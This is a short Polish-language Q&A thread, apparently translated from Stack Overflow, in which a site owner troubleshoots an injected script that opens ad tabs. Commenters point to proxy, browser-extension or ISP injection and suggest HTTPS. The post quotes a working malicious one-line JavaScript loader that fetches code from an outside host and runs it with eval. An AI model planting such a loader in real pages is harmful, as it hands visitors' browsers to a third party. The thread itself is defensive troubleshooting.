6
Jestem trochę zagubiony w tej kwestii, więc przepraszam. Wiem, że istnieją inne wątki na SO o tym, ale nie mogę znaleźć odpowiedzi.Znajdowanie złośliwego oprogramowania na stronie internetowej
W witrynie, gdy jest załadowany, nie ma znaczenia, gdzie użytkownik kliknie, jest otwarta w przeglądarce dodatkowa karta z reklamami.
Co udało mi się znaleźć tak daleko, patrząc na konsoli przeglądarki jest to, że jest załadowany niektóre js plik
http://cdn.mecash.ru/js/replace.js
Ten plik zawiera
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
i patrząc na to tx.js podejrzewam że jest to wstrzyknięty przez hakera.
Problem polega na tym, że szukałem w plikach na przyjmującego i nie może znaleźć żadnego zawierać lub coś tego js ..
Czy ktoś może mi pomóc i powiedzieć gdzie i prawdopodobnie jak mogę znaleźć to?
W rzeczywistości tego typu pliki są często wstrzykiwane przez "proxy innych firm", jeśli są używane, 'zainstalowane rozszerzenia przeglądarki' i' nawet przez niektórych dostawców ISP' bezpośrednio w kodzie HTML, gdy strona jest żądana. Znaczy, nie znajdziesz tego w twoim rzeczywistym kodzie na serwerze .. ale klient ma to js włączone. Lepiej użyj 'https', aby uniknąć takiego człowieka w środkowych modyfikacjach. –
Dostarczanie przez ISP złośliwego oprogramowania js -.- – Viney
Dziękuję. Innymi słowy, mogę przestać kopać w plikach, ponieważ nie znajdę go. A jeśli jest od ISP, nie mogę nawet skontaktować się z pomocą techniczną? Więc opcja tutaj jest https i/lub zmiana mojego dostawcy hostingu? –